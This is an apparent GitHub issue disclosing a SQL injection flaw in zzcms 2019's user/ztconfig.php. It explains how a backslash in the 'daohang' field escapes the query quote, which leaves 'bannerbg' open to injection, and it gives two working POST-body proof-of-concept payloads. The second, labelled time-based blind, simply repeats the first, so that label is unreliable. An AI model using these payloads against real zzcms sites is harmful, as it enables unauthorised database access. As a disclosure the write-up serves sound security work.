zzcms 2019 user/ztconfig.php SQL injection Vulnerability #1
Comments
cby234
changed the title
cby234
changed the title
Sign up for free
to join this conversation on GitHub.
Already have an account?
Sign in to comment
Link Url : http://www.zzcms.net/about/6.htm
Edition : ZZCMS2018升2019 (2019-01-11)
0x01 Vulnerability (/user/ztconfig.php line 29 ~ 50)
When we start 'modify' logic we can see 'daohang' var receive $_POST['daohang'][$i] value
If we give string value for $_POST['daohang'] not Array $_POST['daohang'][0] daohang var will
receive $i's index string not Array. So If we give '\' value for $_POST['daohang'] 'daohang' var
will get '\' value
We can find '\' value in update query it means ' value after 'daohang' parameter does not mean
any more.
After 'daohang' paramter 'bannerbg' will appear and if we check about 'bannerbg' parameter
we can't find any other security filter. So we can inject any query via 'bannerbg' parameter
0x02 payload
give below "POC" value for post data in "/user/ztconfig.php?action=modify"
POC : update SQL injection bannerheight=160&comanestyle=left&comanecolor=%23FFFFFF&daohang=\&img=123&tongji=&baidu_map=&Submit2=+%EC%84%A4%EC%A0%95+%EC%97%85%EB%8D%B0%EC%9D%B4%ED%8A%B8&img=,bannerbg=@@Version+where+username=0x636279323334-- a
POC2 : Time based Blind SQL injection bannerheight=160&comanestyle=left&comanecolor=%23FFFFFF&daohang=\&img=123&tongji=&baidu_map=&Submit2=+%EC%84%A4%EC%A0%95+%EC%97%85%EB%8D%B0%EC%9D%B4%ED%8A%B8&img=,bannerbg=@@Version+where+username=0x636279323334-- a
The text was updated successfully, but these errors were encountered: